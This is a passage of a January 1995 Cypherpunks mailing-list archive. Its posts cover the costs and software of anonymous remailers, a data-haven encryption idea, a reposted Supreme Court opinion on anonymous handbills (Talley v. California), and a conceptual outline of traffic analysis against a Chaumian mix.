is a good example of this.  

>I agree that it's something to look at.

We don't disagree here; we are solving two different problems it appears.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx8uG01Diok8GKihAQHClwP/fVWl/GWM9lWArj4qP4orDV9ZGJWqaCEj
LJYVSekzetdxIn2iBfTcCLCSwYKqTsJgCKha8tqxM9H5Zq2hVUYat9TlGKBZwpfr
b/Vy+N3K1o/+E3NnWxcsJPLaeJfkom1sIJZiZkXKrqUM2v7v2l8MERub7uYG/EIl
5LhaDwdg9ig=
=Acce
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 19 Jan 95 19:52:47 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: The Remailer Crisis
In-Reply-To: <199501200054.QAA11075@netcom21.netcom.com>
Message-ID: <Pine.3.89.9501191948.A23853-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Jan 1995, Timothy C. May wrote:
 
> Well, let's do the math. Since the remailer has to be connected at all
> times, of course, this implies $162 a month in connect charges, over
> and above the other charges. Or $187 a month including the line
> charge. Or $2244 a year. 
> 
> This makes a "cheap Linux box" almost a moot point. This is a lot more
> than I'm willing to pay to run a remailer.

Best.com offers a dedicated 28.8kB line connection to the internet 
with $450 setup charge and $60 a month connect charge.  This
is a permanent connection, not a dial up connection.

This works out to $720 per year, plus setup charge.

This is as cheap as it gets for a box on the internet.

Now this is OK if one wishes to run linux, and have a
remailer as one hobby in addition to the main use of the
box, but it is still a bit much to pay for a dedicated 
remailer.

Now I just do not like linux.  Sure it is a great
operating system but it will not run codewright

(Vi causes mental degeneration.  Even though I detest,
loath, and hate vi, vi takes up so much brainspace that
I find myself issueing vi commands in editors that I 
use much more, and vastly prefer to vi.  Vi is evil.)

Therefore there is no way in the world I am going to
waste a full internet connection and a PC on linux.



 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 19 Jan 95 16:56:32 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Re: Does encrypted equal safe?
In-Reply-To: <9501172355.AA12246@eri.erinet.com>
Message-ID: <Pine.SUN.3.91.950119195241.1505A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995, Paul J. Ste. Marie wrote:

> Date: Tue, 17 Jan 95 18:55:30 EST
> From: Paul J. Ste. Marie <pstemari@erinet.com>
> To: Eric Hughes <eric@remailer.net>, cypherpunks@toad.com
> Subject: Re: Does encrypted equal safe?
> 
> At 01:28 PM 1/17/95 -0800, Eric Hughes wrote:
> > ... Meaning is subjective.  If I see encrypted text, am I to be held
> >responsible for having seen through an encryption for which I hold not
> >the key?  Merely because someone knows a transformation into a
> >disapproved form does not mean that I do. ...
> 
> Which is exactly why the encrypt on receipt or decrypt on delivery ideas 
> won't work.  You have to be provably ignorant of the data.
> 

I must disagree.

This hinges on the REASON for encrypting the data.  In my model, data 
that arrives at the haven unencrypted is unwelcome, and is encrypted to 
be used as traffic "noise," not for security.  Any unencrypted data is 
undesireable, it opening the door to kiddieporn by mail tactics.  
(Government sends user A kiddie porn, then arrests user A for kiddie porn 
possession.)

An automatic encryption of all unencrypted data, the key to which is 
randomly generated and destroyed, allows the traffic to foil analysis, 
while prevents the operator from being subjected to plant frames.

Decrypt on arrival is hardly defenseable in this context of course.

> 
>     --Paul J. Ste. Marie
>       pstemari@well.sf.ca.us, pstemari@erinet.com
> 
> 

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 19 Jan 95 18:06:00 PST
To: cypherpunks@toad.com
Subject: Which remailer does Julf operate?
Message-ID: <Pine.3.89.9501192004.A20171-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain



sez it all

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Judith Milhon <stjude@well.sf.ca.us>
Date: Thu, 19 Jan 95 20:27:16 PST
To: cypherpunks@toad.com
Subject: stjude?
Message-ID: <199501200427.UAA16720@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain



i'd be happy to get forwarded the skirmishes around my existence. Anybody
save them?

i'm not on the list because i'm writing 2 books, but i have root in the
solar system, true, and i did come up with the name cypherpunk one morning
as i was washing my cat... hit me like a meteorite... cypherpunk... yes...

mumble

>jude<




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andre Bacard <abacard@well.sf.ca.us>
Date: Thu, 19 Jan 95 20:37:51 PST
To: cypherpunks@toad.com
Subject: Supreme Court & Anonymity
Message-ID: <199501200437.UAA20363@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
 
Attached is a Supreme Court decision that may bear directly upon
anonymous remailers and upon people who want to curtail anonymous
remailers.
 
This info came from Dave Banisar at EPIC <banisar@epic.org> via
Stanton McCandlish at EFF <mech@eff.org>. Thanks to Attorney
Banisar for supplying this information.
 
See you in the future,
Andre
- ------------------------------------------------------------
Andre Bacard              Bacard wrote "The Computer Privacy
Box 3009                  Handbook: A Practical Guide to E-Mail
Stanford, CA 94309        Encryption, Data Protection, and PGP
abacard@well.com          Privacy Software" [for novices/experts].
 
Introduction by Mitchell Kapor, Chairman, Electronic Frontier
Foundation and Founder of Lotus 1-2-3.
 
         Book Available February 1995. Write for Details
- ------------------------------------------------------------
 
 
                 TALLEY v. CALIFORNIA 
          SUPREME COURT OF THE UNITED STATES 
                     362 U.S. 60 
            January 13-14, 1960, Argued 
               March 7, 1960, Decided 
 
 
Certiorari to the Appellate Department of the Superior Court of
California, Los Angeles County. 
 
 
 172 Cal. App. 2d Supp. 797, 332 P. 2d 447, reversed. 
 
 A. L. Wirin and Hugh R. Manes argued the cause for petitioner. 
With them on the brief was Fred Okrand. 
 
Philip E. Grey argued the cause forrespondent.  With him on the
brief was Roger Arnebergh. 
 
Shad Polier, Will Maslow, Leo Pfeffer and Joseph B. Robison filed
a brief for the American Jewish Congress, as amicus curiae, urging
reversal.
 
Warren, Black, Frankfurter, Douglas, Clark, Harlan, Brennan,
Whittaker, Stewart 
 
 MR. JUSTICE BLACK delivered the opinion of the Court. 
 
The question presented here is whether the provisions of a Los
Angeles City ordinance restricting the distribution of handbills
"abridge the freedom of speech and of the press secured against
state invasion by the Fourteenth Amendment of the Constitution."
 
n1 The ordinance, @ 28.06 of the Municipal Code of the City of Los
Angeles, provides: 
 
"No person shall distribute any hand-bill in any place under any
circumstances, which does not have printed on the cover, or the
face thereof, the name and address of the following: 
 "(a) The person who printed, wrote, compiled or manufactured the
same. 
 "(b) The person who caused the same to be distributed; provided,
however, that in the case of a fictitious person or club, in
addition to such fictitious name, the true names and addresses of
the owners, managers or agents of the person sponsoring said
hand-bill shall also appear thereon." 
 
   The petitioner was arrested and tried in a Los Angeles Municipal
Court for violating this ordinance.  It was stipulated that the
petitioner had distributed handbills in Los Angeles, and two of
them were presented in evidence.  Each had printed on it the
following: 
 
 
   National Consumers Mobilization, 
    Box 6533, 
    Los Angeles 55, Calif. 
    PLeasant 9-1576. 
 
 The handbills urged readers to help the organization carry on a
boycott against certain merchants and businessmen, whose names were
given, on the ground that, as one set of handbills said, they
carried products of "manufacturers who will not offer equal
employment opportunities to Negroes, Mexicans, and Orientals."
There also appeared a blank, which, if signed, would request
enrollment of the signer as a "member of National Consumers
Mobilization," and which was preceded by a statement that "I
believe that every man should have an equal opportunity for
employment no matter what his race, religion, or place of birth." 
 
The Municipal Court held that the information printed on the
handbills did not meet the requirements of the ordinance, found the
petitioner guilty as charged, and fined him $ 10.  The Appellate
Department of the Superior Court of the County of Los Angeles
affirmed the conviction, rejecting petitioner's contention, timely
made in both state courts, that the ordinance invaded his freedom
of speech and press in violation of the Fourteenth and First
Amendments to the Federal Constitution. n2 172 Cal. App. 2d Supp.
797, 332 P. 2d 447. Since this was the highest state court
available to petitioner, we granted certiorari to consider this
constitutional contention. 360 U.S. 928. 
 
In Lovell v. Griffin, 303 U.S. 444,   we held void on its face an
ordinance hat comprehensively forbade any distribution of
literature at any time or place in Griffin, Georgia, without a
license. Pamphlets and leaflets, it was pointed out, "have been
historic weapons in the defense of liberty" n3 and enforcement of
the Griffin ordinance "would restore the system of license and
censorship in its baldest form." Id., at 452. A year later we had
before us four ordinances each forbidding distribution of leaflets
- -- one in Irvington, New Jersey, one in Los Angeles, California,
one in Milwaukee, Wisconsin, and one in Worcester, Massachusetts. 
Schneider v. State, 308 U.S. 147. Efforts were made to distinguish
these four ordinances from the one held void in the Griffin case. 
The chief grounds urged for distinction were that the four
ordinances had been passed to prevent either frauds, disorder, or
littering, according to the records in these cases, and another
ground urged was that two of the ordinances applied only to certain
city areas.  This Court refused to uphold the four ordinances on
those grounds pointing out that there were other ways to accomplish
these legitimate aims without abridging freedom of speech and
press.  Frauds, street littering and disorderly conduct could be
denounced and punished as offenses, the Court said.  Several years
later we followed the Griffin and Schneider cases in striking down
a Dallas, Texas, ordinance which was applied to prohibit the
dissemination of information by the distribution of handbills.  We
said that although a city could punish any person for conduct on
the streets if he violates a valid law, "one who is rightfully on
a street . . . carries with him there as elsewhere the
constitutional right to express his views in an orderly fashion .
. . by handbills and literature as well as by the spoken word."
Jamison v. Texas, 318 U.S. 413, 416. 
 
The broad ordinance now before us, barring distribution of "any
hand-bill in any place under any circumstances," n4 falls precisely
under the ban of our prior cases unless this ordinance is saved by
the qualification that handbills can be distributed if they have
printed on them the names and addresses of the persons who
prepared, distributed  or sponsored them.  For, as in Griffin, the
ordinance here is not limited to handbills whose content is
"obscene or offensive to public morals or that advocates unlawful
conduct." Counsel has urged that this ordinance is aimed at
providing a way to identify those responsible for fraud, false
advertising and libel. Yet the ordinance is in no manner so
limited, nor have we been referred to any legislative history
indicating such a purpose. Therefore we do not pass on the validity
of an ordinance limited to prevent these or any other supposed
evils.  This ordinance simply bars all handbills under all
circumstances anywhere that do not have the names and addresses
printed on them in the place the ordinance requires. 
 
There can be no doubt that such an identification requirement would
tend to restrict freedom to distribute information and thereby
freedom of expression. "Liberty of circulating is as essential to
that freedom as liberty of publishing; indeed, without the
circulation, the publication would be of little value." Lovell v.
Griffin, 303 U.S., at 452. 
 
   Anonymous pamphlets, leaflets, brochures and even books have
played an important role in the progress of mankind.  Persecuted
groups and sects from time to time throughout history have been
able to criticize oppressive practices and laws either anonymously
or not at all.  The obnoxious press licensing law of England, which
was also enforced on the Colonies was due in part to the knowledge
that exposure of the names of printers, writers and distributors
would lessen the circulation of literature critical of the
government.  The old seditious libel cases in England show the
lengths  to which government had to go to find out who was
responsible for books that were obnoxious  to the rulers.  John
Lilburne was whipped, pilloried and fined for refusing to answer
questions designed to get evidence to convict him or someone else
for the secret distribution of books in England.  Two Puritan
Ministers, John Penry and John Udal, were sentenced to death on
charges that they were responsible for writing, printing or
publishing books. n6 Before the Revolutionary War colonial patriots
frequently had to conceal their authorship or distribution of
literature that easily could have brought down on them prosecutions
by English-controlled courts.  Along about that time the Letters of
Junius were written and the identity of their author isunknown to
this day. n7 Even the Federalist Papers, written in favor of the
adoption of our Constitution, were published under fictitious
names.  It is plain that anonymity has sometimes been assumed for
the most constructive purposes. 
 
   We have recently had occasion to hold in two cases that there
are times and circumstances when States may not compel members of
groups engaged in the dissemination of ideas to be publicly
identified. Bates v. Little Rock, 361 U.S. 516; N. A. A. C. P. v.
Alabama, 357 U.S. 449, 462. The reason for those holdings was that
identification and fear of reprisal might deter perfectly peaceful
discussions of public matters of importance.  This broad Los
Angeles ordinance is subject to the same infirmity.  We hold that
it, like the Griffin, Georgia, ordinance, is void on its face. 
 
   The judgment of the Appellate Department of the Superior Court
of the State of California is reversed and the cause is remanded to
it for further proceedings not inconsistent with this opinion. 
 
   It is so ordered. 
 
Footnotes 
 
n1 Schneider v. State, 308 U.S. 147, 154. Cf. Lovell v. Griffin,
303 U.S. 444, 450. 
 
n2 Petitioner also argues here that the ordinance both on its face
and as construed and applied "arbitrarily denies petitioner equal
protection of the laws in violation of the Due Process and Equal
Protection" Clauses of the Fourteenth Amendment.  This argument is
based on the fact that the ordinance applies to handbills only, and
does not include within its proscription books, magazines and
newspapers.  Our disposition of the case makes it unnecessary to
consider this contention. 
 
n3 The Court's entire sentence was: "These [pamphlets and leaflets]
indeed have been historic weapons in the defense of liberty, as the
pamphlets of Thomas Paine and others in our own history abundantly
attest." It has been noted that some of Thomas Paine's pamphlets
were signed with pseudonyms.  See Bleyer, Main Currents in the
History of American Journalism (1927), 90-93. Illustrations of
other anonymous and pseudonymous pamphlets and other writings used
to discuss important public questions can be found in this same
volume. 
 
n4 Section 28.00 of the Los Angeles Municipal Code defines
"handbill" as follows: "'HAND-BILL' shall mean any hand-bill,
dodger, commercial advertising circular, folder, booklet, letter,
card, pamphlet, sheet, poster, sticker, banner, notice or other
written, printed or painted matter calculated to attract attention
of the public." 
 
n5 Lovell v. Griffin, 303 U.S., at 451. 
 
n6 Penry was executed and Udal died as a result of his confinement.
 
1 Hallam, The Constitutional History of England (1855), 205-206,
232. 
 
n7 In one of the letters written May 28, 1770, the author asked the
following question about the tea tax imposed on this country, a
question which he could hardly have asked but for his anonymity: 
"What is it then, but an odious, unprofitable exertion of a
speculative right, and fixing a badge of slavery upon the
Americans, without service to their masters?" 2 Letters of Junius
(1821) 39. 
 
 
MR. JUSTICE HARLAN, concurring. 
 
   In judging the validity of municipal action affecting rights of
speech or association protected against invasion by the Fourteenth
Amendment, I do not believe that we can escape, as Mr. Justice
Roberts said in Schneider v. State, 308 U.S. 147, 161, "the
delicate and difficult   task" of weighing "the circumstances" and
appraising "the substantiality of the reasons advanced in support
of the regulation of the free enjoyment of" speech.  More recently
we have said that state action impinging on free speech and
association will not be sustained unless the governmental interest
asserted to support such impingement is compelling.  See N. A. A.
C. P. v. Alabama, 357 U.S. 449, 463, 464; Sweezy v. New Hampshire,
354 U.S. 234, 265 (concurring opinion); see also Bates v. Little
Rock, 361 U.S. 516. 
 
   Here the State says that this ordinance is aimed at the
prevention of "fraud, deceit, false advertising, negligent use of
words, obscenity, and libel," in that it will aid in the detection
of those responsible for spreading material of that character.  But
the ordinance is   not so limited, and I think it will not do for
the State simply to say that the circulation of all anonymous
handbills must be suppressed in order to identify the distributors
of those that may be of an obnoxious character.  In the absence of
a more substantial showing as to Los Angeles' actual experience
with the distribution  of obnoxious handbills, * such a  
generality is for me too remote to furnish a constitutionally
acceptable justification for the deterrent effect on free speech
which this all-embracing ordinance is likely to have. 
 
 
   On these grounds I concur in the judgment of the Court. 
 
Footnotes: 
 
 
   * On the oral argument the City Attorney stated: 
 
   "We were able to find out that prior to 1931 an effort was made
by the local Chamber of Commerce, urging the City Council to do
something about these handbills and advertising matters which were
false and misleading -- had no names of sponsors.  They were
particularly interested in the fictitious name. They said, 'Who are
these people that are distributing; who are advertising; doing
things of that sort?' The meager record that we were able to find
indicates that a request from the Council to the City Attorney as
to their legal opinion on this subject [sic].  The City Attorney
wrote back and formed the conclusion that distribution of
handbills, pamphlets, or other matters, without the name of the
fictitious firm or officers would be legal [sic].  Thereafter in
the early part of 1932 an ordinance was drafted, and submitted to
the City Council, and approved by them, which related to the
original subject -- unlawful for any person, firm or association to
distribute in the city of Los Angeles any advertisement or handbill
- -- or any other matter which does not have the names of the
sponsors of such literature." 
 
 
MR. JUSTICE CLARK, whom MR. JUSTICE FRANKFURTER and MR. JUSTICE
WHITTAKER join, dissenting. 
 
   To me, Los Angeles' ordinance cannot be read as being void on
its face. Certainly a fair reading of it does not permit a
conclusion that it prohibits the distribution of handbills "of any
kind at any time, at any place, and in any manner," Lovell v.
Griffin, 303 U.S. 444, 451 (1938), as the Court seems to conclude. 
In Griffin, the ordinance completely prohibited the unlicensed
distribution of any handbills.  As I read it, the ordinance here
merely prohibits the distribution of a handbill which does not
carry the identification of the  name of the person who "printed,
wrote, compiled . . . manufactured [or] . . . caused" the
distribution of it.  There could well be a compelling reason for
such a requirement.  The Court implies as much when it observes
that Los Angeles has not "referred to any legislative history
indicating" that the ordinance was adopted for the purpose of
preventing "fraud, false advertising and libel." But even as to its
legislative background there is pertinent material which the Court
overlooks.  At oral argument, the City's chief law enforcement
officer stated that the ordinance was originally suggested in 1931
by the Los Angeles Chamber of Commerce in a complaint to the City
Council urging it to "do something about these handbills and
advertising matters which were false and misleading." Upon inquiry
by the Council, he said, the matter was referred to his office, and
the Council was advised that such an ordinance as the present one
would be valid.  He further stated that this ordinance, relating to
the original inquiry of the Chamber of Commerce, was thereafter
drafted and submitted to the Council.  It was adopted in 1932.  In
the face of this and the presumption of validity that the ordinance
enjoys, the Court nevertheless strikes it down, stating that it
"falls precisely under the ban of our prior cases." This cannot
follow, for in each of the three cases cited, the ordinances either
"forbade any distribution of literature . . . without a license,"
Lovell v. Griffin, supra, or forbade, without exception, any
distribution of handbills on the streets, Jamison   v. Texas, 318
U.S. 413 (1943);  or, as in Schneider v. State, 308 U.S. 147
(1939), which covered different ordinances in four cities, they
were either outright bans or prior restraints upon the distribution
of handbills.  I, therefore, cannot see how the Court can conclude
that the Los Angeles ordinance here "falls precisely" under any of
these cases.  On the contrary, to my mind, they neither control
this case nor are apposite to it.  In fact, in Schneider, depended
upon by the Court, it was held, through Mr. Justice Roberts, that,
"In every case . . . where legislative abridgment of the rights is
asserted, the courts should be astute to examine the effect of the
challenged legislation . . .   weigh the circumstances and . . .
appraise the substantiality of the reasons advanced . . . ." Id.,
at 161. The Court here, however, makes no appraisal of the
circumstances, or the substantiality of the claims of the
litigants, but strikes down the ordinance as being "void on its
face." I cannot be a party to using such a device as an escape from
the requirements of our cases, the latest of which was handed down
only last month.  Bates v. Little Rock, 361 U.S. 516.  n1 
 
   Therefore, before passing upon the validity of the ordinance, I
would weigh the interests of the public in its enforcement against
the claimed right of Talley.  The record is barren of any claim,
much less proof, that he will suffer any injury whatever by
identifying the handbill with his name.  Unlike N. A. A. C. P. v.
Alabama, 357 U.S. 449 (1958), which is relied upon, there is
neither allegation nor proof that Talley or any group sponsoring
him would suffer "economic reprisal, loss of employment, threat of
physical coercion [or] other manifestations of public hostility."
Id., at 462. Talley makes no showing whatever to support his
contention  that a restraint upon his freedom of speech will result
from the enforcement of the ordinance.  The existence of such a
restraint is necessary before we can strike the ordinance down. 
 
   But even if the State had this burden, which it does not, the
substantiality of Los Angeles' interest in the enforcement of the
ordinance sustains its validity.  Its chief law enforcement officer
says that the enforcement of the ordinance prevents "fraud, deceit,
false advertising, negligent use of words, obscenity, and libel,"
and, as we have said, that such was its purpose.  In the absence of
any showing to the contrary by Talley, this appears to me entirely
sufficient. 
 
   I stand second to none in supporting Talley's right of free
speech -- but not his freedom of anonymity.  The Constitution says
nothing about freedom of anonymous speech.  In fact, this Court has
approved laws requiring no less than Los Angeles' ordinance.  I
submit that they control this case and require its approval under
the attack made here.  First, Lewis Publishing Co. v. Morgan, 229
U.S. 288 (1913), upheld an Act of Congress requiring any newspaper
using the second-class mails to publish the names  of its editor,
publisher, owner, and stockholders.  39 U. S. C. @ 233. Second, in
the Federal Regulation of Lobbying Act, 2 U. S. C. @ 267, Congress
requires those engaged in lobbying to divulge their identities and
give "a modicum of information" to Congress. United States v.
Harriss, 347 U.S. 612, 625 (1954).  Third, the several States have
corrupt practices acts outlawing, inter alia, the distribution of
anonymous publications with reference to political candidates. n2
While these statutes are leveled at political campaign and election
practices, the underlying ground sustaining their validity applies
with equal force here. 
 
   No civil right has a greater claim to constitutional protection
or calls for more rigorous  safeguarding than voting rights.  In
this area the danger of coercion and reprisals -- economic and
otherwise -- is a matter of common knowledge.  Yet these statutes,
disallowing anonymity in promoting one's views in election
campaigns, have expressed the overwhelming public policy of the
Nation.  Nevertheless the Court is silent about this impressive
authority relevant to the disposition of this case. 
 
      All three of the types of statutes mentioned are designed to
prevent the same abuses -- libel, slander, false accusations, etc.
The fact that some of these statutes are aimed at elections,
lobbying, and the mails makes their restraint no more palatable,
nor the abuses they prevent less deleterious to the public
interest, than the present ordinance. 
 
   All that Los Angeles requires is that one who exercises his
right of free speech through writing or distributing handbills
identify himself just as does one who speaks from the platform. 
The ordinance makes for the responsibility in writing that is
present in public utterance.  When  and if the application of such
an ordinance in a given case encroaches on First Amendment
freedoms, then will be soon enough to strike  that application
down.  But no such restraint has been shown here.  After all, the
public has some rights against which the enforcement of freedom of
speech would be "harsh and arbitrary in itself." Kovacs v. Cooper,
336 U.S. 77, 88 (1949). We have upheld complete proscription of
uninvited door-to-door canvassing as an invasion of privacy. Breard
v. Alexandria, 341 U.S. 622 (1951). Is this less restrictive than
complete freedom of distribution -- regardless of content -- of a
signed handbill? And commercial handbills may be declared verboten,
Valentine v. Chrestensen, 316 U.S. 52 (1942), regardless of content
or identification.  Is Talley's anonymous handbill, designed to
destroy the business of a commercial establishment, passed out at
its very front door, and attacking its then lawful commercial
practices, more comportable with First Amendment freedoms?  I think
not.  Before we may expect international responsibility among
nations, might not it be well to require individual responsibility
at home?  Los Angeles' ordinance does no more. 
 
   Contrary to petitioner's contention, the ordinance as applied
does not arbitrarily deprive him of equal protection  of the law. 
He complains that handbills are singled out, while other printed
media -- books, magazines, and newspapers -- remain unrestrained. 
However, "the problem of legislative classification is a perennial
one, admitting of no doctrinaire definition.  Evils in the same
field may be of different dimensions and proportions, requiring
different remedies. . . .  Or the reform may take one step at a
time, addressing itself to the phase of the problem which seems
most acute to the legislative mind. . . .  The prohibition of the
Equal Protection Clause goes no further than the invidious
discrimination. [I] cannot say that that point has been reached
here." Williamson v. Lee Optical Co., 348 U.S. 483, 489 (1955). 
 
   I dissent. 
 
Footnotes 
 
n1 "When it is shown that state action threatens significantly to
impinge upon constitutionally protected freedom it becomes the duty
of this Court to determine whether the action bears a reasonable
relationship to the achievement of the governmental purpose
asserted as its justification." 361 U.S., at 525. 
 
n2 Thirty-six States have statutes prohibiting the anonymous
distribution of materials relating to elections.  E. g.: Kan. Gen.
Stat., 1949, @ 25-1714; Minn. Stat. Ann. @ 211.08; Page's Ohio Rev.
Code Ann. @ 3599.09; Purdon's Pa. Stat. Ann., Title 25, @ 3546. 
 
          ********************************************
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel) 
Electronic Privacy Information Center * 202-547-5482 (fax) 
666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
Washington, DC 20003                * HTTP://epic.digicash.com/epic
         **********************************************
 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.7
 
iQCVAwUBLx7L1d6pT6nCx/9/AQHhQwP+PcbJgT5Eyx+9TNIoOSMQJXnnlT0iiHM1
qhKC4Xg2ZZl4/u1Pe927S3UfDXoEunoSAOaq1hgi8c4Wjd31XPM5wFHRdE18/UWZ
RXLmLQ+qT6MIFQIicOs6bpDeLCusqT3SF1krViIpIwqscwcdRgu8t1IUbfMVC/6w
oFsKqF3fj7o=
=XCRK
-----END PGP SIGNATURE-----
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Thu, 19 Jan 95 17:45:27 PST
To: Lucky Green <shamrock@netcom.com>
Subject: Re: What is this? Anonymous message failed
In-Reply-To: <v01510108ab4279f1317d@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950119204225.13707D-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Jan 1995, Lucky Green wrote:

> Just got back a message from Julf's remailer that my Anonymous message failed
> (wrong password). Needless to say, I didn't try to send one through the
> remailer. The message it was refering to is the one I sent to the list
> earlier. Is this a repeat of the an/na problems we had in the past?

	Yes. The unfortunate culprit was <an157790@anon.penet.fi>. I sent 
him mail, non-blinded, and posted a message to Cypherpunks and to 
<cypherpunks-owner> to get it fixed. I haven't been getting them anymore, 
so I suspect somebody fixed the problem.

	A while ago, someone posted a regexp for majordomo that would 
automatically convert a <an> address to a <na> address. Does anyone have 
that lying around anywhere?

Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@pylon.com
Date: Thu, 19 Jan 95 20:46:04 PST
To: cypherpunks@toad.com
Subject: T.A.Z. on Disk
Message-ID: <199501200446.UAA04577@deepthought.pylon.com>
MIME-Version: 1.0
Content-Type: text/plain


I just sent this email to Sandy Sandfort,  and he suggested I 
share it with the list:

-------------------
I was just at BlockBuster Music store this evening and happened 
to go by the 'H's in the Rock Music section  -  and saw Hakim 
Bey's name.  Yes, there is a CD names T.A.Z *.    Blockbuster 
allows customers to listen to CDs before they buy, so I 
listened to it.   Hakim actually reads several chapters from 
his book, and there is odd music at the introduction and in the 
background while he reads.    He has a very nice, deep, clear 
voice.

I guess you could say this is one of those self-help 
books-on-tape   -  sort of a "save time & become an anarchist 
while you drive" CD.


*T.A.Z. = The Autonomous Zone

    ..
Blanc 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@pylon.com
Date: Thu, 19 Jan 95 22:05:30 PST
To: cypherpunks@toad.com
Subject: Ask Bill
Message-ID: <199501200606.WAA05378@deepthought.pylon.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Gates now has an address for questions  -   
askbill@microsoft.com

He has a column which is published every other Wednesday In the 
local Seattle Post-Intelligencer, where he answers a few of the 
questions which he finds in that mailbox address.   He says he 
will not reply to questions personally (only in the column), 
but you never know  -  a few of you special people could burn 
his ear and perhaps elicit one to yourself (or perhaps even to 
the list!)

    ..
Blanc 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Thu, 19 Jan 95 20:39:08 PST
To: stjude@well.sf.ca.us (Judith Milhon)
Subject: Re: stjude?
In-Reply-To: <199501200427.UAA16720@well.sf.ca.us>
Message-ID: <199501200441.WAA03899@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> 
> i'm not on the list because i'm writing 2 books, but i have root in the
> solar system, true, and i did come up with the name cypherpunk one morning
> as i was washing my cat... hit me like a meteorite... cypherpunk... yes...
> 

Now wait just one second here....I have root at Solar Soyuz Zaibatsu and that
is about as close to the solar system as you can get.....you stole the 
passwords......somebody call the net cops !!!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 19 Jan 95 22:43:25 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: The Remailer Crisis
In-Reply-To: <199501200105.RAA05837@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.950119223857.28755A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Jan 1995, sameer wrote:

> 	To my knowledge there exists 3 packages which allow you to run
> a remailer out of an account. Matt Ghio's remailer, mixmaster (Lance
> Cottrell?), and the simple package available on ftp.csua.berkeley.edu,
> which derives from Eric and Hal's original code.

Can anyone give an overview of the remailer packages that are currently
available?  What features and differences do they have, and where to get
them?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 19 Jan 95 22:52:53 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: traffic analyzing Chaum's digital mix
Message-ID: <Pine.SUN.3.91.950119224724.28755B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have been thinking about the problem of traffic analysis of a 
remailer.  More specifically, the problem is how can Eve trace Bob, who 
is communicating with Alice through an ideal Chaumian digital mix?  (As 
most of you know, current remailers are missing many of the features of 
the digital mix Chaum specified in his CACM paper (at 
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/papers/chaum.digital-mix.gz 
), thus making them extremely vulnerable to anyone with non-trivial 
resources.)

The simplifying assumptions I use here are:
1.  there is one mix, which is perfectly secure and trustworthy (note 
    that multiple mixes do not increase untracebility over a single mix if 
    it is perfectly secure and trustworthy)
2.  anyone can monitor all traffic in and out of the mix, but no one can 
    link an incoming message with an outgoing one

The basic approach is to use this raw traffic information to calculate a 
SCORE for each user of the remailer with respect to Alice, where the 
user with the highest SCORE is the person Alice is most probably 
communicating with.  The idea is that with a Chaumian mix, every time 
Alice sends a message to Bob there is always a pattern of Alice sending 
a message to the mix, followed by Bob receiving a message from the mix 
during the next batch.  By counting the number of such correlations for 
each user over a period of time, and taking into account the fact that 
users who receive more messages from the mix will have higher numbers
of coincidental correlations, a SCORE can be calculated so that it would 
be a good indication over the long run of the probability that a particular 
user is communicating with Alice.

For a digital mix that does batching based on a fixed number of incoming 
messages, the SCORE for a user U can be calculated in the following way:
1.  for each mix batch i, calculate P(i)=lesser(# of messages sent by 
    Alice, # of messages subsequently received by user U)
2.  after a period of time t, calculate Q=sum(P(i))
3.  calculate the average value of Q of users with similar usage 
    patterns as user U
4.  SCORE(U) = Q / average(Q)

Now whether or not this approach actually works depends on whether the 
number of users with SCORE higher than Bob's SCORE converges to 0 as 
time t increases, and how quickly it converges.  Answering these two 
questions will require modeling the usage patterns of Alice, Bob, and 
the mix as a whole.  I'll try to do this for some simple cases in a later
post.

